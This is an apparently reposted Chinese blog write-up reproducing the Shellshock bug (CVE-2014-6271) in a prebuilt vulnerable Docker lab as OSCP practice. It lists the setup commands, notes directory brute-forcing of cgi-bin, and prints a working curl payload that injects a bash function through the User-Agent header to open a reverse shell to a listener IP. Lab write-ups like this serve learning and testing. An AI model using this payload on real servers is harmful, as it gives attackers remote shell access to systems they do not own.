CVE-2014-6271漏洞复现

…衆ロ難τιáo~ 提交于 2020-01-16 16:41:27

0x00 前言

要是平时我肯定不会想打去复现这个漏洞的,但是由于需要学习shellshock漏洞的利用,所以这里可以进行一下复现

0x01 正文

这里直接使用别人弄好的docker,简单又方便

docker pull hmlio/vaas-cve-2014-6271

下载完成之后,开启docker

docker run -d -p 80:80 hmlio/vaas-cve-2014-6271

访问目标页面
在这里插入图片描述
这里还需要知道一个路劲,直接dirb
在这里插入图片描述
这里接着对cgi-bin进行一个爆破
在这里插入图片描述
最后拿到目标
执行payload:
curl -A “() { :; }; /bin/bash -i > /dev/tcp/192.168.25.165/2333 0<&1 2>&1” http://192.168.25.178/cgi-bin/stats

这里不使用msf因为oscp 规定msf只能使用一次来着(我隐约记得)

kali监听就行
在这里插入图片描述

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!